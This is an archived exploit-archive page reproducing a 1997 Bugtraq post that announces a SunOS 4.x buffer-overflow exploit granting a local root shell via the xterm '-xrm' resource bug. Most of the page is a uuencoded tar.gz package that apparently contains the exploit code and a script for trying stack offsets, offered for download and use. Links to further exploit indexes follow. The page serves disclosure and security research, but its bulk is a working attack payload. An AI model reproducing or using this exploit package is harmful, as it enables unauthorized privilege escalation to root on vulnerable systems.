SunOS 4.x overflows! This example is for xterm

Summary

Description:	Willy has created SunOS 4.x buffer overflow code, and gives the appended example, which overflows the X libraries.
Author:	Willy TARREAU <tarreau@AEMIAIF.LIP6.FR>
Compromise:	root (local)
Vulnerable Systems:	SunOS 4.x for this particular exploit. Many other systems are vulnerable (see my other pages on the topic).
Date:	8 July 1997
Notes:	This is in uuencoded form. Be sure to copy & paste, don't save as a file because it has html codez in it.

Details

Date: Tue, 8 Jul 1997 17:11:40 +0200
From: Willy TARREAU 
To: BUGTRAQ@NETSPACE.ORG
Subject: Buffer Overflows exploit for SunOS 4.1.4

Hello,

   about one month ago, I posted here a generic exploit for buffer
overflows on SunOS 4. I didn't find a real bug which could be exploited in
a standard application so my exploit applied only to my own programs.

Now, I succeeded in getting a root shell using the X11 ressource manager
bug ('xterm -xrm xxxxxxxxxxxxxxxxxxx...xxxxxxxxx'), which isn't new, but
demonstrates that my exploit really works.

As I saw, there aren't many buffer overflow exploits for SunOS, perhaps
because of some complications.

My package includes a script which can automatically try several stack
offsets, which could be useful when testing a wrapper in development.

You can retrieve this on my web page:

        http://www-miaif.lip6.fr/willy/security/sunos.html

Hope this can help somebody...

Willy Tarreau
--
+---------------+------------------------+----------------------------------+
| Willy Tarreau | tarreau@aemiaif.lip6.fr | http://www-miaif.lip6.fr/willy/ |
| Magistere d'Informatique Appliquee de l'Ile de France (MIAIF), promo 97   |
| DEA  A.S.I.M.E. |  Universite Pierre et Marie Curie (Paris 6), FRANCE     |
+-----------------+---------------------------------------------------------+






begin 600 sunos-ovf.tar.gz.uue
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
A*JFDDDHJJ:222BJII))**JFDDDKZ;Z%_`&XYH;8`4```
`
end

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: